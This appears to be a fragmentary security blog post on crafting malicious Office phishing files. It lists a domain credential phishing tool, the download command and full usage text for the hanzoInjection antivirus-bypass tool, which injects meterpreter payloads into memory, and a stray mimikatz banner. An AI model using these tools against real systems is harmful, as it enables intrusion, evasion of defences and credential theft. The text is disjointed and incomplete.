Office is an extremely popular office suite on the Windows platform, and a growing share of APT attacks are carried out through crafted malicious Office files; it is also one of the attack methods with a fairly high success rate. The most covert and effective approach is, of course, to attack through 0days in the Office suite, but that has drawbacks too: first, not everyone has a 0day, and second, the X-days that have already been published may only work against certain fixed versions of Office. So the focus of this article is not on how to use X-days, but on summarizing the currently known ways of constructing Office phishing files, in the hope that it helps those learning hacking and, of course, that readers can avoid falling victim to this kind of attack.
windows domain credentials phishing tool
Download: click here. DEMO: http://player.vimeo.com/video/89782344?portrait=0&color=c9ff23
bypassAV_hanzoInjection
Download hanzoInjection:
git clone https://github.com/P0cL4bs/hanzoInjection.git
Usage:
```
Usage: HanzoInjection.exe [Options] [-h] [-e] [-o] [-p] [-b]
the HanzoIjection is a tool focused on injecting arbitrary codes in memory to bypass common antivirus solutions.
Developer: Mharcos Nesster (mh4x0f)
Email:mh4root@gmail.com
Site: www.chmodsecurity.com.br
Greetx: P0cL4bs Team { N4sss , MMXM , Chrislley, MovCode, joridos }
-------------------------------------------------------------------
Arguments Options:
OPTION TYPE DESCRIPTION
-e,--execute [.raw] Name of file.bin, payload metasploit type raw
-p,--payload [.raw] Payload meterpreter type [RAW] requered parameter -o [output]
-o,--output [file.cs] Output generate project file.cs injection memory payload c#
-b,--binder [NULL] Binder File EXE with encrypt file PE not requered paramenter
-h,--help [Help] show this help and exit
Example Usage:
HanzoInjection.exe -e payload_meterpreter.bin
HanzoInjection.exe -p meterpreter.bin -o injection_memory.cs
HanzoInjection.exe -b
```
Kerberos
Kerberos Modules
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 9 2015 00:33:13)